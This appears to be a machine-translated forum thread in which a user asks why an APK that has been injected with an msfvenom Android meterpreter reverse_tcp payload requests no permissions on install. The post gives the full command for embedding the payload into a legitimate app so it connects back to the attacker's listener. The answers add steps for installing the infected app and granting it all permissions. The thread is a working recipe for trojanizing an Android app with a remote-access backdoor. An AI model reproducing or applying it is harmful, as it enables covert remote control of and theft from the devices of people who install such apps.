我正在尝试使用msfvenom有效负载注入apk,从而在安装后在我的android设备上获得后门。为什么在安装时不要求权限?
过去,我已经能够成功创建独立的有效负载并获得通往我设备的后门隧道。
msfvenom -p android / meterpreter / reverse_tcp -x /Users/root/Downloads/newApp.apk LHOST = [IP] LPORT = [port] -o /Users/root/Desktop/android.apk
我希望该应用程序请求清单文件中指定的所有权限,但在安装过程中或运行时不要求任何权限。
答案 0 :(得分:1)
我遇到了同样的问题,但是我找到了解决方法。
我已经检查了它并且可以正常工作
答案 1 :(得分:0)
您需要指定Main.apk在设备中拥有的权限。是否检查了这些权限?如果没有询问权限的机会,那么它是否没有权限。
答案 2 :(得分:0)
我在payload生成中发现了一些问题,但我也找到了解决方案。
1.- 在原始应用程序中注入有效载荷。
2.- 在安卓设备上安装 apk 文件。
3.- 转到应用程序设置并搜索受感染的应用程序。
4.- 授予所有权限。
就是这样,这对我有用。